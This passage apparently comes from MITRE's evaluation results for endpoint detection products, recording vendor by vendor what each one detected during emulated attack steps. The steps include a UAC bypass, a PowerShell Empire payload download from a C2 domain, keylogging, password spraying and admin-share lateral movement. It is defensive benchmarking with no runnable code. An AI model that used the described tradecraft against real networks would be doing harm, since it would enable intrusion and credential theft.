No detection capability demonstrated for this procedure, though an alert called "PowerShell executed encoded commands" triggered due to svchost.exe creating powershell.exe with the -enc command-line argument. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Telemetry
Telemetry showed an integrity level change from medium (2) to high (3) for powershell.exe, which is indicative of bypass UAC. [1] [2] [3]
Specific Behavior
A Specific Behavior alert was generated for a possible UAC bypass. The alert was tagged with the correct ATT&CK Technique (Bypass User Account Control) and Tactics (Defense Evasion, Privilege Escalation). [1] [2] [3]
Microsoft
Telemetry (Tainted)
Telemetry showed execution of powershell.exe executing "Invoke-BypassUACTokenManipulation" Empire cmdlet under the context of user Bob with medium integrity level, execution of svchost.exe with seclogon flag to use impersonation service with new high integrity powershell.exe process as SYSTEM, and subsequent context adjustment of powershell.exe to user Bob (tainted by the parent alert for suspicious sequence of exploration activities). [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Telemetry
Telemetry showed a process integrity level change from parent powershell.exe (medium / 8192) to child powershell.exe (high / 12288). [1] [2] [3] [4]
Indicator of Compromise
An Indicator of Compromise alert was generated identifying a PowerShell Empire script performing the bypass UAC attack. [1] [2] [3] [4]
RSA
None
No detection capability demonstrated for this procedure. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed process integrity levels changing from medium to high (tainted by parent alert). Integrity level numbers are based upon how the capability tracks integrity levels and not how Windows tracks them causing a difference in values. [1]
Carbon Black
Telemetry
The vendor demonstrated to MITRE that the capability can provide telemetry of network connections and file modifications indicating a Remote File Copy, but no screenshot was captured for this procedure. [1] [2] [3] [4]
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because PowerShell retrieved the file wdbypass from www.freegoogleadsenseinfo.com (C2 domain) over port 8080. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Specific Behavior (Tainted)
A Specific Behavior alert was generated based on the downloading and execution of wdbypass, identified as Fileless malware, from freegoogleadsenseinfo.com (C2 domain) over port 8080. The alert also showed decoded PowerShell commands extracted from the command-line arguments showing a connection over port 8080 with a HTTP request to download the wdbypass payload. The alert was tainted by a parent PowerShell alert [1] [2] [3] [4] [5] [6] [7]
Endgame
Telemetry
Telemetry showing decoded PowerShell telemetry extracted from the command-line arguments showed a connection over port 8080 with a HTTP request to download wdbypass payload. [1] [2] [3] [4]
FireEye
Enrichment
The capability enriched a HTTP GET request for wdbypass with an alert for PowerShell URL Request (Weak Signal). The alert also was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and Tactic (Command and Control). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
Telemetry
Telemetry showed powershell.exe making an HTTP GET request over port 8080 to freegoogleadsenseinfo.com (C2 domain) for the file wdbypass. [1] [2] [3] [4] [5] [6]
Specific Behavior
A Specific Behavior alert was generated for PowerShell downloading a significant amount of data using HTTP(S). [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe making an HTTP GET request over port 8080 to freegoogleadsenseinfo.com (C2 domain) for the file wdbypass (tainted by the parent "Powershell executed encoded commands" alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
None
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2] [3] [4] [5] [6] [7] [8]
Microsoft
Telemetry (Tainted)
Telemetry showed network connection to 192.168.0.5 (C2 server) over port 8080 as well as decoded PowerShell making a connection over port 8080 with a HTTP request to download wdbypass payload. (tainted by alert on suspicious PowerShell command-line arguments). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Palo Alto Networks
None
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
RSA
None
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2] [3] [4]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3]
CrowdStrike
None
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2] [3] [4] [5] [6]
Cybereason
Specific Behavior (Tainted)
A Specific Behavior alert was generated for powershell.exe executed as a PowerShell downloader. The alert was tagged with the correct ATT&CK Tactic (Command and Control) and the Technique (Standard Application Layer Protocol). Data also showed decoded PowerShell commands extracted from the command-line arguments showing a connection over port 8080 with a HTTP request to download the wdbypass payload. The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry
Telemetry showing decoded PowerShell telemetry extracted from the command-line arguments showed a connection over port 8080 with a HTTP request to download wdbypass payload. [1] [2] [3] [4] [5]
FireEye
Enrichment
The capability enriched a HTTP GET request with an alert for PowerShell URL Request (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1071 - Standard Application Layer Protocol) and Tactic (Command and Control). [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed powershell.exe making an HTTP GET request over port 8080 to freegoogleadsenseinfo.com (C2 domain) for the file wdbypass. [1] [2] [3] [4] [5]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe making an HTTP GET request over port 8080 to freegoogleadsenseinfo.com (C2 domain) for the file wdbypass (tainted by the parent "Powershell executed encoded commands" alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4]
McAfee
None
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2] [3] [4] [5]
Microsoft
Telemetry (Tainted)
Telemetry showed a decoded PowerShell script invoked that created a web request to the C2 server with related data showing the connection was made (tainted by alert on suspicious PowerShell command-line arguments). [1] [2] [3] [4] [5]
Palo Alto Networks
None
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2]
RSA
None
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2]
Carbon Black
Telemetry
Telemetry showed network connection to 192.168.0.5 (C2 server) over TCP port 8080. [1] [2] [3] [4] [5] [6]
CrowdStrike
Telemetry
Telemetry showed a network connection event to 192.168.0.5 (C2 server) on TCP port 8080 that was associated with the encoded PowerShell IEX command. [1] [2] [3] [4]
Cybereason
Specific Behavior (Tainted)
A Specific Behavior alert was generated for powershell.exe executed as a PowerShell downloader. The alert was tagged with the correct ATT&CK Tactic (Command and Control) and the Technique (Commonly Used Port). Data also showed decoded PowerShell commands extracted from the command-line arguments showing a connection over port 8080 with a HTTP request to download the wdbypass payload. The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed powershell.exe making a network connection over port 8080. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
General Behavior
A General Behavior alert for Command and Control was triggered because of PowerShell making a connection over TCP port 8080. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showing decoded PowerShell telemetry extracted from the command-line arguments showed a connection over port 8080 with a HTTP request to download wdbypass payload. [1] [2] [3] [4] [5] [6] [7] [8]
FireEye
Telemetry (Tainted)
Telemetry showed a connection to freegoogleadsenseinfo.com (C2 domain) over TCP port 8080. The telemetry was tainted by the parent PowerShell URL Request (Weak Signal) alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified that the Empire instance communicated with freegoogleadsenseinfo.com (C2 domain) over port 8080. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
Telemetry
Telemetry showed powershell.exe making an HTTP GET request over port 8080 to freegoogleadsenseinfo.com (C2 domain) for the file wdbypass. [1] [2] [3]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe making an HTTP GET request over port 8080 to freegoogleadsenseinfo.com (C2 domain) for the file wdbypass (tainted by the parent "Powershell executed encoded commands" alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Telemetry
Telemetry showed a network connection to 192.168.0.5 (C2 server) over TCP port 8080. [1] [2] [3] [4] [5]
Microsoft
Telemetry (Tainted)
Telemetry showed a connection to 192.168.0.5 (C2 server) on port 8080 was made (tainted by alert on suspicious PowerShell command-line arguments). [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Telemetry
Telemetry showed an outgoing network connection to www.freegoogleadsenseinfo.com (C2 domain) over port 8080. [1] [2] [3] [4] [5] [6] [7]
RSA
Telemetry
Telemetry showed network connection to 192.168.0.5 (C2 server) over port 8080. Though it does not count as a detection, telemetry also showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed network connections over port 8080. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
Enrichment
The capability enriched the events with a tag titled \"PowerShell Input Capture -keylogger\" based on known modloads that could be potentially abused to provide keylogger functionality. [1] [2]
Telemetry
Telemetry showed modloads associated with the execution of a keylogger. [1] [2]
CrowdStrike
Telemetry
Telemetry showed the decoded PowerShell script, which displayed the function Get-Keystrokes. [1] [2] [3] [4]
General Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was identified because they observed the adversary logging keystrokes based on the GetKeystrokes PowerShell function. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Cybereason
Indicator of Compromise
An Indicator of Compromise alert was generated based on the execution of a malicious command in PowerShell named Get-Keystrokes. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed modloads associated with the execution of a keylogger. [1] [2] [3] [4] [5] [6]
Endgame
None
No detection capability demonstrated for this procedure, though the capability pulled PowerShell Script Block logs from the host to show the execution of Get-KeyStrokes. [1] [2] [3]
FireEye
None
No detection capability demonstrated for this procedure, though the capability detected PowerShell activity during the time of the keylogging. [1]
F-Secure
Telemetry
Telemetry showed powershell.exe executing the GetAsyncKeyState method, indicating keylogging. [1] [2]
Enrichment
The capability enriched powershell.exe with a tag indicating .NET keylogging. [1] [2]
GoSecure
None
No detection capability demonstrated for this procedure. The vendor noted the capability can create a new condition that would track all actions on a certain file of interest. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
None
No detection capability demonstrated for this procedure. [1]
Microsoft
Telemetry (Tainted)
Telemetry showed powershell.exe making API calls consistent with keylogger behavior. Telemetry also showed execution of Get-Keystrokes Empire PowerShell cmdlet (tainted by alert on PowerShell script with suspicious content). Vendor stated that Input Capture telemetry is captured but it was not immediately visible in the portal. Vendor made changes to the portal during the test to enable by default the visibility of these events. [1] [2] [3] [4] [5] [6] [7]
Specific Behavior (Delayed)
A delayed Specific Behavior alert was generated on keylogging activity in powershell.exe. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Enrichment
The capability enriched the execution of a specific API call as keylogging and suspicious activity. [1] [2] [3] [4] [5]
Indicator of Compromise
An Indicator of Compromise alert was generated identifying a PowerShell Empire script logging keys pressed, time, and the active window. [1] [2] [3] [4] [5]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
Enrichment (Tainted)
The capability enriched data collected as keylogging behavior that was not visible through the standard interface during the evaluation. The capability associated the keylogging event to the parent Group ID even though it is not visible in the data provided. [1] [2] [3]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
Telemetry
Telemetry showed the decoded PowerShell script, which displayed the API call GetForegroundWindow to enumerate the active window. [1]
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure.
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed powershell.exe executing the GetForegroundWindow method. [1]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
Indicator of Compromise
An Indicator of Compromise alert was generated identifying a PowerShell Empire script logging keys pressed, time, and the active window. [1] [2]
Telemetry
Telemetry showed the decoded PowerShell script, which includes the API call GetForegroundWindow to enumerate the active window. [1] [2]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because IT_tasks.txt was retrieved from a network share as a file of interest. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3]
Telemetry
Telemetry showed a file read event for IT_tasks.txt by powershell.exe as well as a FsPostOpen event indicating IT_tasks.txt was opened. [1] [2] [3]
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure. Had malicious access to it_tasks been detected, response actions allow file retrieval which could have identified credentials in files.
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed powershell.exe executing the Get-Content cmdlet on IT_tasks.txt. [1]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure, though telemetry was available that showed execution of Get-Content PowerShell cmdlet. Data does not show what file the cmdlet was executed on. [1]
Palo Alto Networks
Telemetry
Telemetry showed a file read event for IT_tasks.txt. [1]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
Enrichment (Configuration Change)
The capability enriched individual net.exe events with tagging titled \"Credential Access using Admin Shares - Failed Attempts\". The capability was modified after the start of the evaluation enabling enrichment to appear, so the detection is identified as a configuration change. [1] [2] [3] [4]
Telemetry
Telemetry showed a process tree containing repeated logon attempts via net.exe and command-line arguments indicative of password spraying. [1] [2] [3] [4]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally using several accounts. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed, Tainted)
OverWatch generated General Behavior alerts indicating the net use commands were suspicious. The alerts were tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed repeated logon attempts via net.exe with command-line arguments indicative of password spraying, including details that the logons were for local admin (type 6) and that they failed. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry
Telemetry showed net.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Enrichment (Tainted)
The capability enriched net.exe execution with a related ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The data was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6]
Endgame
Enrichment (Tainted)
The capability enriched each individual net.exe logon attempt with a tag titled Lateral Movement via \"Mounting Hidden Shares\" (tainted by parent PowerShell alert). [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
Enrichment (Delayed, Tainted)
The capability enriched net.exe connection events with a related ATT&CK Technique (T1077 - Windows Admin Shares) and Tactics (Execution, Lateral Movement) (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
FireEye
Telemetry (Configuration Change)
Telemetry showed the logon failure from Kmitnick by searching for Windows Security Log Event ID 4625. A configuration change was made to allow for the capture of Windows Security Event ID 4625. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified that the attacker attempted to access systems using four accounts. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched repeated logon attempts via net.exe with an alert for Net Use Command Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1077 - Windows Admin Share) and Tactic (Lateral Movement).  The four events were included under the same alert and each of the passwords were redacted by the capability. The vendor indicated the un-redacted passwords could be observed in triage/acquistion data. [1] [2] [3] [4] [5] [6] [7] [8]
F-Secure
Enrichment
The capability enriched multiple occurrences of net.exe usage as indicative of brute forcing a remote system as well as the correct ATT&CK Technique ID (Brute Force). Screenshot is not available due to sensitivity of rule logic. [1] [2]
Telemetry
Telemetry showed repeated logon attempts via net.exe with command-line arguments indicative of password spraying. [1] [2]
GoSecure
Enrichment (Tainted)
The capability enriched each individual net.exe logon attempt with the condition  \"Net User Reconnaissance Command\". The enrichment was tainted by the parent \"Powershell executed remote commands\" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing repeated logon attempts via net.exe. The telemetry was tainted by a trace detection on powershell.exe. [1] [2] [3] [4]
Specific Behavior
A Specific Behavior alert was generated for powershell.exe performing a potential brute force password hack via the net utility. [1] [2] [3] [4]
Microsoft
Specific Behavior (Delayed)
A delayed Specific Behavior alert was generated based on brute force attempt by accessing remote SMB shares with different accounts. The alert spans multiple login attempts. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe with command-line arguments indicative of password spraying (tainted by parent alert on PowerShell script with suspicious content). Telemetry also showed failed authorization attempts due to bad passwords as indicated by a fallback request over WebDAV to port 80 on the C2 server, but did not indicate the two failed access attempts on Morris and Conficker that were due to the accounts having insufficient access on the systems. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Palo Alto Networks
General Behavior
A General Behavior alert was generated for sensitive administrative shares mapping with unexpected parent. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). The log files showed an exit code of 0x2 which indicates a logon failure, but does not differentiate between bad credentials and access denied to resource. [1] [2] [3] [4]
Carbon Black
Telemetry
Telemetry showed a process tree containing repeated logon attempts via net.exe targeting ADMIN$. [1] [2] [3] [4] [5] [6]
Specific Behavior
Specific Behavior alerts titled "Windows Admin Shares - Lateral Movement" were generated for credential accesses specifically targeting admin shares. [1] [2] [3] [4] [5] [6]
CrowdStrike
Telemetry
Telemetry showed repeated logon attempts via net.exe with command-line arguments targeting ADMIN$ shares on the machines 10.0.1.4 (Morris) and 10.0.1.6 (Nimda). [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed, Tainted)
OverWatch generated General Behavior alerts indicating the net use commands attempting logon to ADMIN$ shares were suspicious. The alerts were tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for net.exe attempting to mount an administrative share. The alert was tagged with the correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched net.exe connection events with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement) (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed repeated logon attempts targeting ADMIN$ via net.exe and command-line arguments. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
Specific Behavior (Tainted)
A Specific Behavior alert was triggered for each individual net.exe connection with a tag titled Lateral Movement via "Mounting Hidden Shares" (tainted by parent PowerShell alert). [1] [2] [3] [4] [5] [6]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net Use Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement). The four events were included under the same alert. [1] [2] [3] [4] [5] [6] [7] [8]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior
Specific Behavior alerts were generated for net.exe connecting to a remote administrative share. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed repeated logon attempts targeting ADMIN$ via net.exe and command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
GoSecure
Enrichment (Tainted)
The capability enriched individual net.exe logon attempts targeting ADMIN$ with the condition \"Net User Reconnaissance Command\". The enrichment was tainted by the parent \"Powershell executed remote commands\" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6] [7]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing repeated logon attempts targeting ADMIN$ via net.exe. The telemetry was tainted by a trace detection on powershell.exe. [1] [2] [3] [4] [5]
Microsoft
Telemetry (Tainted)
Telemetry showed repeated logon attempts to ADMIN$ via net.exe with command-line arguments (tainted by parent alert on PowerShell script with suspicious content). Telemetry also showed failed authorization attempts due to bad passwords as indicated by a fallback request over WebDAV to port 80 on the C2 server, but did not indicate the two failed access attempts on Morris and Conficker that were due to the accounts having insufficient access on the systems. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Specific Behavior (Delayed)
A delayed Specific Behavior alert was generated based on brute force attempt by accessing remote SMB shares with different accounts. The alert spans multiple login attempts. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6]
Specific Behavior
A Specific Behavior alert was generated for a net.exe logon attempt to ADMIN$. The alert was tagged with the correct ATT&CK Technique (Windows Admin Shares). [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed repeated logon attempts targeting ADMIN$ via net.exe and command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed repeated logon attempts targeting ADMIN$ via net.exe and command-line arguments. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). The log files showed an exit code of 0x2 which indicates a logon failure, but does not differentiate between bad credentials and access denied to resource. [1] [2] [3] [4] [5]
Carbon Black
Telemetry
Telemetry showed a process tree containing a successful logon via net.exe. [1] [2] [3] [4] [5]
CrowdStrike
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the successful net use connection was suspicious. The alert was tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to connect using the valid credentials of user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a parent powershell.exe detection. [1] [2] [3] [4]
Cybereason
Telemetry
Telemetry showed net.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3]
Enrichment (Tainted)
The capability enriched a logon attempt via net.exe, using the valid credentials of user Kmitnick, with a related ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The data was tainted by a parent PowerShell alert. [1] [2] [3]
Endgame
Enrichment (Tainted)
The capability enriched the net.exe connection using valid credentials for Kmitnick with a tag titled Lateral Movement via \"Mounting Hidden Shares\" (tainted by parent PowerShell alert). [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe and command-line arguments using valid credentials for user Kmitnick (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
Enrichment (Delayed, Tainted)
The capability enriched net.exe connection events with a related ATT&CK Technique (T1077 - Windows Admin Shares) and Tactics (Execution, Lateral Movement) (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
FireEye
Enrichment
The capability enriched a logon attempt via net.exe using valid credentials for user Kmitnick with an alert for Net Use Command Execution (Weak Signal). The password for Kmitnick was redacted within the capability. The vendor indicated the un-redacted passwords could be observed in triage/acquistion data. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed the successful logon for the user Kmitnick. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed a logon attempt via net.exe with command-line arguments to connect using the valid credentials of user Kmitnick. Telemetry also showed a logon event for user Kmitnick on Conficker (10.0.0.5). [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to connect using the valid credentials of user Kmitnick. The telemetry was tainted by the parent "Powershell executed remote commands" alert. Telemetry also showed explorer.exe (as the user Bob) write a PIPE on Conficker, which could indicate to an analyst that the share had been successfully mounted. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4]
McAfee
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to login using the valid credentials of user Kmitnick. The telemetry was tainted by a trace detection on powershell.exe. Telemetry also showed a login event on Conficker (10.0.0.5) for user Kmitnick. [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to connect using the valid credentials of user Kmitnick (tainted by parent alert on PowerShell script with suspicious content). Telemetry showed Kmitnick login event on 10.0.0.5 (Conficker) and that 10.0.1.5 (CodeRed) accessed resources on 10.0.0.5 (Conficker). [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Enrichment
The capability enriched an lsass.exe event with the correct ATT&CK Technique (Valid Accounts). [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) using valid credentials for user Kmitnick followed by an event for the credentials being validated by the DC. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed a logon attempt via net.exe and command-line arguments using valid credentials of user Kmitnick. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed a logon attempt using valid credentials of user Kmitnick via net.exe and command-line arguments (tainted by relationship to threat story). The log files showed an exit code of 0x2 which indicates a logon failure, but does not differentiate between bad credentials and access denied to resource. [1] [2] [3] [4]
Carbon Black
Telemetry
Telemetry showed a process tree containing repeated logon attempts via net.exe targeting ADMIN$, eventually resulting in a successful logon. [1] [2] [3] [4] [5] [6]
Specific Behavior
Specific Behavior alerts were generated mapped to the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement) for successful logons. [1] [2] [3] [4] [5] [6]
CrowdStrike
General Behavior (Delayed)
